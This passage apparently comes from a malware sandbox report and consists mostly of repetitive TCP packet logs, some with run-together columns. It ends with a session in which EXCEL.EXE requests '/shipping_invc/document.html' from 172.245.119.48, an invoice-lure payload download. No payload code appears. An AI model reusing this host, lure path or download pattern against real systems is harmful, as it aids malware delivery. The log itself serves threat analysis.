                                                                                                                                                                                            Jun 28, 2022 10:46:38.109791040 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109810114 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109831095 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109831095 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109855890 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109874010 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109877110 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109896898 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109898090 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109918118 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109936953 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109956026 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109956026 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109978914 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109980106 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109999895 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110006094 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110018969 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110038996 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110048056 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110059023 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110086918 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110111952 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110162020 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110179901 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110198021 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110217094 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110219955 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110238075 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110256910 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110260963 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110280037 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110281944 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110299110 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110318899 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110321045 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110337019 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110356092 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110358000 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110374928 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110383987 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110398054 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110418081 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110424042 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110438108 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110456944 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110460997 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110476017 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110486031 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110495090 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110513926 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110522032 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110538006 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110557079 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110563993 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110575914 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110593081 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110594034 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110614061 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110616922 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110634089 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110652924 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110656023 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110675097 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110697985 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110697985 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110718012 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110733032 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110735893 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110754967 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110763073 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110774994 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232188940 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232206106 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232222080 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232228994 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232239008 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232245922 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232271910 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232286930 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232301950 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232320070 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232322931 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232347012 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232361078 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232368946 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232387066 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232393980 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232403040 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232419968 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232429028 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232467890 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232489109 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232507944 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232525110 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232527971 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232542038 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232558966 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232566118 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232605934 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232606888 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232624054 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232640982 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232645035 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232681990 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232707977 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232726097 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232748985 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232750893 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232768059 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232784986 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232785940 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232800961 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232831955 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232836962 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232851982 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232856035 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232876062 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232892990 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232892990 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232916117 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232927084 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232933044 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232952118 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232965946 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232968092 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.232985973 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233010054 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233014107 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233031988 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233033895 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233047962 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233064890 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233073950 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233082056 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233098030 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233114004 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233114004 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233139038 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233165979 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233181000 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233196020 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233212948 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233232975 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233233929 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233248949 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233267069 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233273983 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233298063 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233341932 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233360052 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233376980 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233392954 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233401060 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233409882 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233426094 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233428001 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233443975 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233452082 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233493090 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233500004 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233516932 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233532906 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233536959 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233577013 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233608007 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233624935 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233640909 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233644962 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233656883 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233675003 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233681917 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233690977 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233706951 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233720064 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233724117 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233746052 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233773947 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233795881 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233818054 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.233835936 CEST8049783172.245.119.48192.168.2.4
Jun 28, 2022 10:46:38.233846903 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.233851910 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.233867884 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.233880997 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.233916998 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.233932018 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.233948946 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.233975887 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.233975887 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.233993053 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234008074 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234035015 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234076023 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234076023 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234092951 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234111071 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234127045 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234143972 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234168053 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234174967 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234190941 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234215021 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234232903 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234241009 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234261036 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234273911 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234278917 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234297037 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234306097 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234313965 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234332085 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234350920 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234373093 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234374046 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234389067 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234405041 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234405041 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234421968 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234440088 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234440088 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234457970 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234471083 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234474897 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234493017 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234508038 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234512091 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.234527111 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234544039 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.234586954 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348176003 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348217010 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348242044 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348244905 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348264933 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348285913 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348288059 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348311901 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348335981 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348335981 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348357916 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348380089 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348381042 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348402977 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348426104 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348428011 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348448038 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348453999 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348469973 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348503113 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348505020 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348529100 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348551989 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348563910 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348572969 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348593950 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348594904 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348615885 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348615885 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348639011 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348661900 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348664045 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348685026 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348707914 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348710060 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348732948 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348741055 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348754883 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348773003 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:38.348773956 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348795891 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:38.348849058 CEST  49783  80  192.168.2.4  172.245.119.48
Jun 28, 2022 10:46:43.270066023 CEST  80  49783  172.245.119.48  192.168.2.4
Jun 28, 2022 10:46:43.270215034 CEST  49783  80  192.168.2.4  172.245.119.48
• 172.245.119.48
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49773        172.245.119.48  80                C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp  kBytes transferred  Direction  Data
Jun 28, 2022 10:45:23.452174902 CEST  1378  OUT  GET /shipping_invc/document.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 172.245.119.48
Connection: Keep-Alive
Jun 28, 2022 10:45:23.572532892 CEST  1379  IN  HTTP/1.1 200 OK
Date: Tue, 28 Jun 2022 08:45:23 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
Last-Modified: Mon, 27 Jun 2022 11:16:27 GMT
ETag: "54ed-5e26c0d18ab3c"
Accept-Ranges: bytes
Content-Length: 21741
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
